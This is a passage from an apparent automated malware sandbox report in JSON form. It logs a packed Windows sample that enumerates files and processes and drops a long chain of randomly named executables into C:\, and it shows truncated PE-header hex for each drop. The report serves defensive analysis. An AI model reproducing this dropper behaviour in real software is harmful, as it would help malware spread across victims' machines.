\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00006116)\n \"80824.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006128)\n \"80824.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006128)\n \"80824.exe\" called \"FindNextFileW\" with parameter 466844.exe (UID: 00000000-00006128)\n \"80824.exe\" called \"FindNextFileW\" with parameter 80824.exe (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"80824.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"466844.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"82466.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nhftnd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hxtnlx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xpvvjv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pftnv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xjhvjn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nthpjvt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jdjdt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"00666.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lvnptpp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vnbvdx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rdflttb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rjffft.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4066668.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"48628.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dpdlf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dltbld.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"24640.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"680284.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ptppdf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rhnlvvj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ltnlpd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has an entrypoint in section \"UPX1\"\n \"088822.exe\" has an entrypoint in section \"UPX1\"\n \"xvndjvv.exe\" has an entrypoint in section \"UPX1\"\n \"60884.exe\" has an entrypoint in section \"UPX1\"\n \"ldrttb.exe\" has an entrypoint in section \"UPX1\"\n \"rfhlpxb.exe\" has an entrypoint in section \"UPX1\"\n \"8668622.exe\" has an entrypoint in section \"UPX1\"\n \"68646.exe\" has an entrypoint in section \"UPX1\"\n \"6844880.exe\" has an entrypoint in section \"UPX1\"\n \"ljvbrr.exe\" has an entrypoint in section \"UPX1\"\n \"rxvjbx.exe\" has an entrypoint in section \"UPX1\"\n \"frbnhn.exe\" has an entrypoint in section \"UPX1\"\n \"dthhtb.exe\" has an entrypoint in section \"UPX1\"\n \"hxpnnf.exe\" has an entrypoint in section \"UPX1\"\n \"rtdhhn.exe\" has an entrypoint in section \"UPX1\"\n \"rjtxj.exe\" has an entrypoint in section \"UPX1\"\n \"60024.exe\" has an entrypoint in section \"UPX1\"\n \"0642260.exe\" has an entrypoint in section \"UPX1\"\n \"8402600.exe\" has an entrypoint in section \"UPX1\"\n \"tfftdr.exe\" has an entrypoint in section \"UPX1\"\n \"tjbljn.exe\" has an entrypoint in section \"UPX1\"\n \"xdnld.exe\" has an entrypoint in section \"UPX1\"\n \"vfdlx.exe\" has an entrypoint in section \"UPX1\"\n \"rjlbb.exe\" has an entrypoint in section \"UPX1\"\n \"ftnpjx.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" wrote 14618 bytes starting with PE header signature to file \"C:\\80824.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"80824.exe\" wrote 14635 bytes starting with PE header signature to file \"C:\\466844.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"466844.exe\" wrote 14653 bytes starting with PE header signature to file \"C:\\420260.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"420260.exe\" wrote 14668 bytes starting with PE header signature to file \"C:\\82466.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"82466.exe\" wrote 14686 bytes starting with PE header signature to file \"C:\\hvjtfdj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hvjtfdj.exe\" wrote 14704 bytes starting with PE header signature to file \"C:\\nhftnd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nhftnd.exe\" wrote 14719 bytes starting with PE header signature to file \"C:\\hthbft.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hthbft.exe\" wrote 14733 bytes starting with PE header signature to file \"C:\\hxtnlx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hxtnlx.exe\" wrote 14745 bytes starting with PE header signature to file \"C:\\pfflf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pfflf.exe\" wrote 14760 bytes starting with PE header signature to file \"C:\\xpvvjv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xpvvjv.exe\" wrote 14774 bytes starting with PE header signature to file \"C:\\pftnv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pftnv.exe\" wrote 14790 bytes starting with PE header signature to file \"C:\\ddvtj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ddvtj.exe\" wrote 14804 bytes starting with PE header signature to file \"C:\\xjhvjn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xjhvjn.exe\" wrote 14817 bytes starting with PE header signature to file \"C:\\nthpjvt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nthpjvt.exe\" wrote 14834 bytes starting with PE header signature to file \"C:\\jdjdt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jdjdt.exe\" wrote 14850 bytes starting with PE header signature to file \"C:\\hxfhrx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hxfhrx.exe\" wrote 14870 bytes starting with PE header signature to file \"C:\\00666.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00666.exe\" wrote 14887 bytes starting with PE header signature to file \"C:\\6666266.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6666266.exe\" wrote 14904 bytes starting with PE header signature to file \"C:\\04040.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"04040.exe\" wrote 14924 bytes starting with PE header signature to file \"C:\\lvnptpp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lvnptpp.exe\" wrote 14939 bytes starting with PE header signature to file \"C:\\vlvdf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vlvdf.exe\" wrote 14958 bytes starting with PE header signature to file \"C:\\vnbvdx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vnbvdx.exe\" wrote 14976 bytes starting with PE header signature to file \"C:\\rdflttb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rdflttb.exe\" wrote 14992 bytes starting with PE header signature to file \"C:\\phxdv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"phxdv.exe\" wrote 15003 bytes starting with PE header signature to file \"C:\\hfbbnn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hfbbnn.exe\" wrote 15021 bytes starting with PE header signature to file \"C:\\rpdjn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rpdjn.exe\" wrote 15032 bytes starting with PE header signature to file \"C:\\rjffft.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rjffft.exe\" wrote 15043 bytes starting with PE header signature to file \"C:\\0204422.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0204422.exe\" wrote 15062 bytes starting with PE header signature to file \"C:\\00022.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00022.exe\" wrote 15072 bytes starting with PE header signature to file \"C:\\4066668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4066668.exe\" wrote 15084 bytes starting with PE header signature to file \"C:\\48628.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"48628.exe\" wrote 15095 bytes starting with PE header signature to file \"C:\\dpdlf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dpdlf.exe\" wrote 15105 bytes starting with PE header signature to file \"C:\\dhnnvp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dhnnvp.exe\" wrote 15119 bytes starting with PE header signature to file \"C:\\dltbld.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dltbld.exe\" wrote 15129 bytes starting with PE header signature to file \"C:\\240286.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"240286.exe\" wrote 15147 bytes starting with PE header signature to file \"C:\\204084.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"204084.exe\" wrote 15159 bytes starting with PE header signature to file \"C:\\24640.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24640.exe\" wrote 15175 bytes starting with PE header signature to file \"C:\\680284.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"680284.exe\" wrote 15185 bytes starting with PE header signature to file \"C:\\66608.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66608.exe\" wrote 15196 bytes starting with PE header signature to file \"C:\\04048.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"04048.exe\" wrote 15210 bytes starting with PE header signature to file \"C:\\6040224.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6040224.exe\" wrote 15223 bytes starting with PE header signature to file \"C:\\bdfnxb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bdfnxb.exe\" wrote 15238 bytes starting with PE header signature to file \"C:\\jvvxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jvvxj.exe\" wrote 15254 bytes starting with PE header signature to file \"C:\\ptppdf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ptppdf.exe\" wrote 15272 bytes starting with PE header signature to file \"C:\\rhnlvvj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhnlvvj.exe\" wrote 15291 bytes starting with PE header signature to file \"C:\\ltnlpd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ltnlpd.exe\" wrote 15306 bytes starting with PE header signature to file \"C:\\nhffd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nhffd.exe\" wrote 15326 bytes starting with PE header signature to file \"C:\\lbvfrdl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lbvfrdl.exe\" wrote 15344 bytes starting with PE header signature to file \"C:\\fdtfnb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fdtfnb.exe\" wrote 15357 bytes starting with PE header signature to file \"C:\\tjphthx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tjphthx.exe\" wrote 15372 bytes starting with PE header signature to file \"C:\\bpjjvll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bpjjvll.exe\" wrote 15383 bytes starting with PE header signature to file \"C:\\pbdvnt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pbdvnt.exe\" wrote 15399 bytes starting with PE header signature to file \"C:\\rhpxblx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhpxblx.exe\" wrote 15409 bytes starting with PE header signature to file \"C:\\ftnpjx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ftnpjx.exe\" wrote 15427 bytes starting with PE header signature to file \"C:\\rjlbb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rjlbb.exe\" wrote 15441 bytes starting with PE header signature to file \"C:\\vfdlx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vfdlx.exe\" wrote 15457 bytes starting with PE header signature to file \"C:\\xdnld.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xdnld.exe\" wrote 15474 bytes starting with PE header signature to file \"C:\\tjbljn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tjbljn.exe\" wrote 15488 bytes starting with PE header signature to file \"C:\\tfftdr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tfftdr.exe\" wrote 15505 bytes starting with PE header signature to file \"C:\\8402600.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8402600.exe\" wrote 15521 bytes starting with PE header signature to file \"C:\\0642260.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0642260.exe\" wrote 15540 bytes starting with PE header signature to file \"C:\\60024.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60024.exe\" wrote 15555 bytes starting with PE header signature to file \"C:\\rjtxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rjtxj.exe\" wrote 15565 bytes starting with PE header signature to file \"C:\\rtdhhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"088822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xvndjvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60884.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ldrttb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rfhlpxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8668622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"68646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6844880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ljvbrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rxvjbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"frbnhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX 